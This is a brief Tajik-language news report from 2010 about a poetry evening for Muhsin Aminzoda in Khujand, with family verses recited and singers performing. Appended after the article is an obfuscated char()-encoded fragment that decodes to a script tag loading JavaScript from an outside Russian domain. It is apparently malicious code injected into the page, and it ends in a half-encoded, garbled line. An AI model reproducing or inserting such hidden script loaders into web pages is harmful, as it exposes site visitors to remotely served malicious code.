30.04.2010
Шаби эҷодии шоир
Дирӯз дар толори Муассисаи давлатии «Қасри ҷавонон»-и ба номи Лоиқ Шералии шаҳри Хуҷанд шаби эҷодии шоир Мӯҳсин Аминзода баргузор гардид. Ин ҷамомад таҳти унвони Занҷири заррини шеър гузашт. Дар чорабинӣ меҳмонони зиёд шоирону нависандагон, аҳли пайвандони шоир ва дӯстдорони назму наво ҷамъ омаданд.
Шоир аз ашъори бобояш Мирмӯҳсин Ҳоҷӣ (Осӣ) ва падараш Муҳаммад Амини мударрис шеърҳо қироат намуд. Аммаи шоир бошад бо тахаллуси Оҷиз шеър мегуфтааст ва сатрҳои шеъри ӯ низ барои тамошобинон қироат гардид. Мӯҳсин Аминзода лаҳзае аз шоираи ширинкалом Озод Аминзода ёдовар гардид. Шеъри дар васфи ӯ навиштаашро қироат намуд. Намоиши лаҳзаҳо аз ҷашни 75 - солагии шоира аз ҷониби аҳли толор хуш пазируфта шуд.
Иштироки сарояндагони варзида Ҷӯрабек Муродов, Акрамҷон Абдуллоев, Носир Раҳимов, Абдураҳмон Абдураҳмонов чорабиниро ба базми шеъру суруд табдил дод.

Суғд
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)8eeb326df1cd29454271188469d9ce92.js" type="text/javascript">